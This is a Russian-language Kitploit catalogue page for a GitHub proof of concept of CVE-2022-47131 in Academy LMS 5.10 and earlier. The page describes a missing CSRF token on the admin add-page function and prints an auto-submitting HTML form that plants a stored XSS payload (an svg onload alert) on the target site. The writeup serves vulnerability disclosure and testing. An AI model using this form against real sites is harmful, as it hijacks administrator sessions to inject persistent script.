Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-47131 — Academy LMS <= 5.10 CSRF / XSS | Kitploit
Инструменты/GitHubGitHub/openxp-research/cve-2022-47131
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubopenxp-research/cve-2022-47131

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Репозиторий
272 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

Описание

Academy LMS — это приложение, где люди могут создавать и рекламировать курсы. Функция добавления новой страницы уязвима к CSRF, так как отсутствует токен, который предотвращал бы эту атаку. Кроме того, эта страница может использоваться для загрузки сохранённой XSS-нагрузки.

Доказательство концепции (POC)

Первый шаг нашего доказательства концепции — аутентификация на платформе под администратором.

После этого просто перейдите на страницу, содержащую код для эксплуатации уязвимости. Обратите внимание, что на домашней странице сайта появится новая кнопка, перенаправляющая на XSS-страницу.

Код, используемый в эксплойте:

<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/custom_page/add" method="POST">
       <input type="hidden" name="page&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="page&#95;content" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;domain&#41;&#59;&gt ;" />
       <input type="hidden" name="files" value="" />
       <input type="hidden" name="button&#95;title" value="CSRF&#32;XSS" />
       <input type="hidden" name="button&#95;position" value="header" />
       <input type="hidden" name="page&#95;url" value="xss" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
Скачать инструмент